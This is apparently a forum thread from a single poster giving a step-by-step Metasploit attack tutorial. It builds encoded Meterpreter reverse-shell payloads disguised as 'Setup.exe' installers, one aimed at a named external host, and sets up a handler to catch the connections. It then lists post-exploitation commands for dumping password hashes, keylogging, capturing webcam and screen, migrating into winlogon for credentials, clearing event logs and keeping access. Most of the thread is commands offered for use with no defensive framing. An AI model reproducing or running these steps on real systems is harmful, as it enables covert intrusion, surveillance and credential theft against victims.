MSF Reverse TCP Kali 2 Example

View previous topic View next topic Go down

MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 21:29




Code:
#!/bin/bash
# Usage ./Start.sh
#
echo "Opening Listener... Type: msfconsole -r meterpreter.rc from anoother Terminal"
service apache2 start && service postgresql start && msfconsole -r meterpreter.rc
Code:
Create Code

Code:
#!/bin/bash
# Usage ./Create.sh "90.217.250.57"
# Usage ./Create.sh "jnet.sytes.net"
# jnet.sytes.net
#
service apache2 start && service postgresql start && msfconsole
echo "Ext Mode Start"
myvar="$@"
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -p windows/meterpreter/reverse_tcp LHOST="$myvar" -b "\x00" -f exe -o /usr/FullSetup.exe

echo "Int Mode Start"
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -p windows/meterpreter/reverse_tcp LHOST=192.168.0.69 -b "\x00" -f exe -o /usr/Setup.exe

clear
echo "Opening Listener..."
msfconsole -r meterpreter.rc


(For external Networks use Ext IP For LHOST)


Code:
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -p windows/meterpreter/reverse_tcp LPORT=4444  LHOST=192.168.0.69 b "\x00" -f exe -o /usr/Setup.exe


Last edited by jamied_uk on 25th August 2016, 13:14; edited 4 times in total
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 21:47

offensive-security.com/metasploit-unleashed/writing-meterpreter-scripts/
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 21:53

offensive-security.com/metasploit-unleashed/msfvenom
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 21:58

Firewall Alias (for port forwarding rules)!

Code:
sudo apt-get install -y gufw



Code:
alias firewall='sudo gufw'
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 22:12

Shell Binding

Code:
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 22:18

More

(For Linux Binaries aswell as Windows)


Code:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf






netsec.ws/?p=331
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 22:20

Now For Creating The Listener

Code:
touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST 192.168.0.69 >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc
Code:

Now to run

msfconsole -r meterpreter.rc



avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 23:11

Code Update Link
app.box.com/s/ul2khq3x7d1uoym480b39fzk0qxuiy2r
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 20th August 2016, 23:29

Connect to a session


Code:
sessions -i 1


Last edited by jamied_uk on 21st August 2016, 12:58; edited 1 time in total
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 21st August 2016, 11:49

Test Notes & Video (Part 2)




Grab the Test Notes.txt file from link above,

the reason 10 failed after attempt 2 was due to a line for listener not being used on Kali but the second test on windows 10 works fine!

i tried initially with win 10 disabled the defender and then after windows 7 was successful i tried win 10 again (after that missing line was used) and it worked and 2 sessions seen on Kali Side Smile

Mission Success More Vids to come so make sure to subscribe and also be part of the video and help with research to be featured on my youtube chanel ( you will get credit and recommendation to sub your channel if you have 1, for more info message me oin here or reply Smile


Update Link For Notes
app.box.com/s/ul2khq3x7d1uoym480b39fzk0qxuiy2r


VId (Extra) Coming Soon!

you need to migrate so to find what PID Explorer.exe is using do the following command


Code:
PS


Last edited by jamied_uk on 21st August 2016, 12:52; edited 3 times in total
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 21st August 2016, 12:14



Extra Extra More More More


Keep and eye for more vids subscribe for more


youtube.com/channel/UCpi2AA868yHOSyvN-FejDjg


Last edited by jamied_uk on 21st August 2016, 13:55; edited 1 time in total
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 21st August 2016, 12:17

Commands for inside msf>

Get username
Code:
getuid


Code:
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
[*]



Get a Shell (Shell Access)

Code:
shell




Migrate To Full Access Mode Persistence Very Happy

Code:
run post/windows/manage/migrate 260   (where 260 is pid of explorer.exe)

List processes

Code:
ps

Search for file ( at least 3 examples)

Code:
search


Code:
search -f autoexec.bat


Code:
search -f sea*.bat c:\\xamp\\





Code:
getuid



Get hash dump of there SAM

Code:
hashdump

Check Idle Time

Code:
idletime

There ipconfig


Code:
ipconfig


[*]Webcam

[*]
Code:
webcam_list

Code:
webcam_snap


Code:
webcam_snap -h

Code:
webcam_snap -i 1 -v false

Desktop Screenshot
Code:
meterpreter > migrate 260
Code:
[*] Migrating to 260...
[*] Migration completed successfully.
meterpreter > use espia
Loading extension espia...success.
meterpreter > screengrab
Screenshot saved to: /root/nYdRUppb.jpeg
meterpreter >













[*]File Upload
[*]
Code:
upload




[*]
Clear Logs

Code:
clearev





Exec a file remotely
Code:
execute -f cmd.exe -i -H



For Help in the meantime

offensive-security.com/metasploit-unleashed/meterpreter-basics
offensive-security.com/metasploit-unleashed/screen-capture
[*]offensive-security.com/metasploit-unleashed/persistent-backdoors


Last edited by jamied_uk on 21st August 2016, 16:26; edited 1 time in total
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 21st August 2016, 15:24

Firewall Rules

Code:
netsh advfirewall firewall add rule name="Open Port 4444" dir=in action=allow protocol=TCP localport=4444
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 25th August 2016, 08:51

Keylogger Key Logging MSF




Code:
exploit



check which PID (explorer.exe)

Code:
ps


Migrate to that pid number for explorer.exe (number will be different)

Code:
migrate 768

Start keylogging

Code:
keyscan_start


Now dump the key logs


Code:
keyscan_dump


Migrate to winlogin process to gain login credentials Very Happy

401 winlogon.exe C:\WINNT\system32\winlogon.exe

use ps to find the pid for that process).



offensive-security.com/metasploit-unleashed/keylogging
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 25th August 2016, 11:18

Using Domain Instead Of A Static IP

avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 25th August 2016, 13:27

After restarting a target the session will end to make it persistent, you will need to add a start up option so that it can reconnect after a restart!
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by jamied_uk on 25th August 2016, 23:06

MSF For Linux Mint

Metasploit for Mint





Metesploit For Linux Mint

Code:



curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && sudo chmod 755 msfinstall && ./msfinstall









Code:
#!/bin/bash
# Usage: ./msf.sh
#
msfconsole








More On...

https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
avatar
jamied_uk
Admin

Posts : 2280
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk

Back to top Go down

Re: MSF Reverse TCP Kali 2 Example

Post by Sponsored content


Sponsored content


Back to top Go down

View previous topic View next topic Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum